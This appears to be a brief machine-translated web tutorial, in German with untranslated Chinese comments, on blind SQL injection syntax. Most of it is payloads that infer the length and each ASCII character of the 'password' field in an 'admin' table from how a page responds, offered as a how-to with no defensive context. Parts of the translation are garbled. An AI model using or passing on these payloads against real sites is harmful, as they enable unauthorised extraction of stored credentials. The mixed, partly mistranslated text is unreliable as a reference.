Informationen zur SQL-Blindinjection-Syntax

Wenn auf der Seite keine falschen Zahlen angezeigt werden, verwenden Sie die Blind-Injection-Syntax, um den Dateninhalt basierend auf Seitenänderungen zu bestimmen

Ermitteln Sie die Datenlänge:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

Ermitteln Sie die angegebene Anzahl von Ziffern von Daten:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc(） //将字符转换成ascii码 方便进行比较

Empfohlen: „MySQL-Video-Tutorial“

Das obige ist der detaillierte Inhalt vonInformationen zur SQL-Blindinjection-Syntax. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!